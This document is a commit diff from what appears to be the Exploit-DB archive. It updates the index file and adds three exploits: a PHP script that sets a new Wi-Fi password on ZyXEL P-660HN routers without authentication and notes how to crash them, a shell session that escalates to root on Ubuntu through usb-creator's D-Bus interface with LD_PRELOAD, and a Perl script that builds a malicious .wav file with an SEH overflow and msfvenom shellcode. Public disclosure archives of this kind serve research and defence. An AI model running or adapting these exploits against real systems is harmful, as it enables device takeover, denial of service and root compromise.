DB: 2015-04-24

3 new exploits

files.csv

@@ -26594,7 +26594,7 @@ id,file,description,date,author,platform,type,port
 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
-36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
+36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
@@ -33218,5 +33218,8 @@ id,file,description,date,author,platform,type,port
 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
 36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
-36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
+36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
-36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
+36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
+36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
+36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
+36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0

platforms/hardware/dos/36825.php

@@ -0,0 +1,58 @@
+<?php
+/*
+Exploit Title   : ZYXEL remote configuration editor / Web Server DoS
+Date            : 23 April 2015
+Exploit Author  : Koorosh Ghorbani
+Site            : http://8thbit.net/
+Vendor Homepage : http://www.zyxel.com/
+Platform        : Hardware 
+Tested On       : ZyXEL P-660HN-T1H_IPv6
+Firmware Version: 1.02(VLU.0)
+--------------------------
+ Unattended remote access  
+--------------------------
+ZYXEL Embedded Software does not check Cookies And Credentials on POST method so 
+attackers could changes settings and view pages with post method .
+
+--------------------------
+      DoS Web Server
+--------------------------
+sending empty Post to admin pages will crash internal web server and router needs
+to hard reset .
+
+*/
+$banner = "   ___ _______ _     ____  _ _______ \r\n" . "  / _ \__   __| |   |  _ \(_)__   __|\r\n" ." | (_) | | |  | |__ | |_) |_   | |   \r\n" ."  > _ <  | |  | '_ \|  _ <| |  | |   \r\n" ." | (_) | | |  | | | | |_) | |  | |   \r\n" ."  \___/  |_|  |_| |_|____/|_|  |_|   \r\n" ."                                     \r\n" ."                                     \r\n";
+print $banner;
+function Post($packet,$host)
+{
+	try {
+		$curl = curl_init();
+		curl_setopt($curl, CURLOPT_URL, $host);
+		curl_setopt($curl, CURLOPT_POST, 1);
+		curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
+		curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
+		curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
+		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+		$result = curl_exec($curl);
+		curl_close($curl);
+		return $result;
+	}catch (Exception $e ){
+		echo $e->getMessage();
+		return "" ;
+	}
+}
+if(sizeof($argv) < 3) {
+	print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
+    exit(1);
+}
+$host = $argv[1];
+$password = urlencode($argv[2]);
+$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
+$target = "http://$host/cgi-bin/WLAN_General.asp";
+if(strlen(Post($packet,$target)) > 0){
+    print "Seems Changed !";
+}else{
+    print "Humm , No Chance !";
+}
+//DoS : Post("",$target) ;
+?>

platforms/linux/local/36820.txt

@@ -0,0 +1,23 @@
+Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
+Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396
+
+Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu    (Patched in: 0.2.38.3ubuntu0.1)
+Ubuntu Trusty  (14.04LTS) <= usb-creator 0.2.56.3ubuntu     (Patched in: 0.2.56.3ubuntu0.1)
+Ubuntu Utopic  (14.10) <= usb-creator 0.2.62ubuntu0.2         (Patched in: 0.2.62ubuntu0.3)
+
+$ cat > test.c
+void __attribute__((constructor)) init (void)
+{
+chown("/tmp/test", 0, 0);
+chmod("/tmp/test", 04755);
+}
+^D
+$ gcc -shared -fPIC -o /tmp/test.so test.c
+$ cp /bin/sh /tmp/test
+$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
+method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
+$ ls -l /tmp/test
+-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
+$ /tmp/test
+# id
+euid=0(root) groups=0(root)

platforms/windows/local/36826.pl

@@ -0,0 +1,43 @@
+#!/usr/bin/env perl
+# original p0c https://www.exploit-db.com/exploits/36465/
+# credit to TUNISIAN CYBER
+# however he was attemping to vanilla buffer overflow 
+# in fact it is SEH based exploit 
+# using the address 0x7C9D30D7 is limit the targets
+#which I assume belongs to OS file didn't work on win7
+#yes he did find a buffer overflow since the offset reaches ESP before SEH
+#in this app,  SEH based exploits are more effective and the main vuln in this case should be SEH
+#This p0c > win 7s & 8s
+# ThreatActor at CoreRed.com 
+##
+
+my $file = "p0c.wav";
+my $buff = "A" x 4116; # offset to SEH
+my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
+my $seh = pack('V', 0x66E42A79); # 66E42A79 5E  POP ESI ogg.dll
+my $nop = "\x90" x 28;
+
+#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
+my $shell = 
+"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
+"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
+"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
+"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
+"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
+"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
+"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
+"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
+"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
+"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
+"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
+"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
+"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
+"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
+"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
+"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";
+
+open($FILE,">$file");
+print $FILE $buff.$nseh.$seh.$nop.$shell;
+close($FILE);
+print "+++++++++++++++++++\n";
+